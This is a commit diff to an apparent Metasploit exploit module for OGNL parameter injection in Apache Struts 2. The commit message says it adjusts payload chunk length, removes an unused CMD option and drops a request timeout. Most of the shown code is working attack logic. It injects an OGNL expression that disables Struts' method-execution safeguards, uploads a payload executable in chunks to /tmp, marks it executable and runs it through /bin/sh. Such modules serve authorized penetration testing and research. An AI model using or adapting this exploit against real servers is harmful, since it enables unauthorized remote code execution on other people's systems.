Various fixes and improvements

Chunk_length now varies according to targeturi and parameter
A few typographical inconsistences corrected
CMD option removed as its not being used
custom http request timeout removed

Author: Console

modules/exploits/multi/http/struts_code_exec_parameters.rb

@@ -69,15 +69,14 @@ def initialize(info = {})
 				[
 					Opt::RPORT(8080),
 					OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),
-					OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]),
-					OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
+					OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"])
 				], self.class)
 	end
 
 	def execute_command(cmd, opts = {})
 		inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
 		inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true"
-		inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['Parameter']))
+		inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))
 		inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))
 		uri = String.new(datastore['TARGETURI'])
 		uri = normalize_uri(uri)
@@ -86,20 +85,18 @@ def execute_command(cmd, opts = {})
 			'uri'     => uri,
 			'version' => '1.1',
 			'method'  => 'GET',
-		}, 15)
+		})
 		return resp #Used for check function.
 	end
 
 	def exploit
 		#Set up generic values.
 		@payload_exe = rand_text_alphanumeric(4+rand(4))
 		pl_exe = generate_payload_exe
-		chunk_length = 384
 		append = 'false'
 		#Now arch specific...
 		case target['Platform']
 		when 'linux'
-			chunk_length = 128 #Complains of a long filename if left default.
 			@payload_exe = "/tmp/#{@payload_exe}"
 			chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
 			exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
@@ -123,7 +120,8 @@ def exploit
 		end
 
 		#Now with all the arch specific stuff set, perform the upload.
-
+		chunk_length = 2048 - (exec_cmd.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length)
+		chunk_length = ((chunk_length/4).floor)*3
 		while pl_exe.length > chunk_length
 			java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)
 			pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]